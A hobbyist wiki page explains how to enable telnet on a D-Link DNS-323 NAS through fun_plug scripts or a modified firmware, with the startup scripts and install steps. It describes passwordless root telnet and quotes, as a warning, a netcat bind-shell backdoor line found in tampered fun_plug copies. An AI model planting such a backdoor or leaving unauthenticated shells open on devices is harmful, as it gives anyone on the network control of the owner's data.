Enabling Telnet

Before you even try this, please be :!: WARNED :!: that using telnet to your DNS-323 you can very easily brick your unit.

Enabling Telnet without modifying the firmware

An easy way to enable Telnet without modifying your firmware is to install Fonz funplug. (More info here). You can rollback your changes (and remove telnet access) later on by simply removing Fonz funplug files and reboot.

It is commonly accepted that you can't harm your device this way (you still should know what you do when using telnet).

Be aware that anyone can login with the username “nobody” with no password. Also true using “admin” and no password if you have not set up a password for the admin web page. For best results just use telnet to enable ssh and disable telnet after that.

Modified firmware with telnet access

I (piotr) used Helge's instructions to build firmwares in order to modify Dlink's firmware version 1.05. Currently it adds telnet access on port 23 without password authentication. You can download and reflash via the web interface. Only telnet is added, the rest of the firmware functionality is left intact.

This allows you to do filesystem checks since running telnet from the ramdisk allows the raid/hard disks to be umounted, just umount them and run e2fsck.


modified DNS323 1.05 firmware with telnet access
md5

Instructions:

  • Check the md5sum of the firmware you downloaded. (The firmware also embedded CRC, but better safe than sorry).
  • Reflash your DNS323 using the web interface
  • Wait at least 3 minutes to be sure the unit is reflashed correctly
  • If you enter via web interface and see the option to recreate the raid again, just reboot the unit with the power button so the old raid is recognised and run again.
  • Now you can operate as normal, but port 23 should be open with telnet access

I like this method better than running as fun_plug since the latter causes the FS not to be cleanly umounted, leading to filesystem corruption over time. Dlink's firmware is really crappy, and doesn't check the filesystem. I have informed Dlink about this fact.

You should be able to go back to an official firmware using the web interface update.

Create the fun_plug

The first thing you need to do is to create a fun_plug. The minimum fun_plug for telnet access looks like this:

#
# Minimal fun_plug, only enables telnet
#
# Requires: /mnt/HD_a2/starttelnet.sh
#           /mnt/HD_a2/lnx_bin/busybox3
#           /mnt/HD_a2/lnx_bin/utelnetd
#
 
#
# Uncomment next line if you want "proof of concept". 
# A filem dmesg.out will be located on \\NAS\HDD_1 or 
# \\NAS\Volume_1 depending on firmware version.
#
# dmesg > /mnt/HD_a2/dmesg.out
 
#
# Start the telnet deamon
#
/mnt/HD_a2/starttelnet.sh
#
# The contents of starttelnet.sh itself
 
/mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ptyp0 c 2 0
/mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ptyp0
/mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ttyp0 c 3 0
/mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ttyp0
 
rm /mnt/HD_a2/lnx_bin/sh
ln -s /mnt/HD_a2/lnx_bin/busybox3  /mnt/HD_a2/lnx_bin/sh
/mnt/HD_a2/lnx_bin/utelnetd -l /mnt/HD_a2/lnx_bin/sh -d

Please take note that this is the minimal setup required to have Telnet enabled on the DNS-323. The minimal setup using this starttelnet.sh has a one major drawback that it operates directly from the installed HDD. This will prevent the filesystem from being unmounted which makes file system checks or the normal RAID rebuild procedure (automatic or manual from the web interface) impossible. The HDDs will still go to power save, though.

This will become a problem when the filesystem becomes corrupted, due to a power outage or other errors.

With Telnet running from the HDD filesystem, we cannot unmount /dev/md0 and therefore cannot run fsck /dev/md0, but we cannot run Fsck without Telnet, obviously. But we can copy the needed components to the RAMdisk and run Telnet from there:

# improved starttelnet.sh, enabling the filesystems to be unmounted and checked, if need be. 
 
# copy the provided components to a directory on the ramdisk
# the ramdisk is regenerated with every boot, so the copy has no lasting effects at all
# simply copy the two files over
cp /mnt/HD_a2/lnx_bin/utelnetd /sbin/utelnetd
cp /mnt/HD_a2/lnx_bin/busybox3 /bin/busybox3
 
# create the terminal device as usual
/bin/busybox3 mknod /dev/ptyp0 c 2 0
/bin/busybox3 chmod 0666 /dev/ptyp0
/bin/busybox3 mknod /dev/ttyp0 c 3 0
/bin/busybox3 chmod 0666 /dev/ttyp0
 
# make a shell link on the ramdisk
mkdir /bin/busybox3.dir/
PATH="$PATH:/bin/busybox3.dir"
 
ln -s /bin/busybox3  /bin/busybox3.dir/sh
 
# and start the Telnet service from the ramdisk as well
/sbin/utelnetd -l /bin/busybox3.dir/sh -d

Now you can connect via Telnet and perform fsck without getting the error message ”/dev/md0 is busy”. (Note: samba is still sharing the HDD for your network, also preventing the HDD from being unmounted - but smb can be safely stopped or started from the Telnet console by issuing “smb stop” or “smb start”.)

Updated 2009/12/06: The line

ln -s /bin/busybox3  /bin/busybox3.dir/sh

was missing from the above script.

Download Telnet

WARNING Be careful what you download. Some copies of fun_plug contain backdoors like using nc (netcat) to allow unauthenticated access to port 10000. Running netcat like this may cause the unmount problems described above. E.g.

/mnt/HD_a2/nc -l -p 10000 -e /bin/sh &

Next step is to dowload the files required. KRH kindly provided them for us and you can now download them from here: utelnet-kit.tar.gz. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!:

From this file, extract the following files:

  • starttelnet.sh
  • utelnetd
  • busybox3

Installing Telnet

When all files are extracted you need to install them. This can be achieved in several ways covered in the fun_plug howto. The most important is that the files reside on the first disc and in the following structure and that they have rights to execute.

  ./fun_plug
  ./starttelnet.sh
  ./lnx_bin/utelnetd
  ./lnx_bin/busybox3

Note that '.' represents \\NAS\HDD_1 on a 1.01 unit and \\NAS\Volume_1 on a 1.02/1.03 unit.

Final Touch

The final touch of this is a reboot of your DNS-323. When the unit has started up you should have telnet access. Recommended client for Windows is PuTTY

What's Next

So; now you have a telnet access and want to do something with it. Maybe a debian Sarge chroot system. Upgrade your iTunes server or make your ftp server working in a NAT'ed environment. You can even set-up your own WEB server using lighttpd.

But remember, always have fun, ;-), and be aware that you're now in a position where you can easily brick your unit.


Navigation

Personal Tools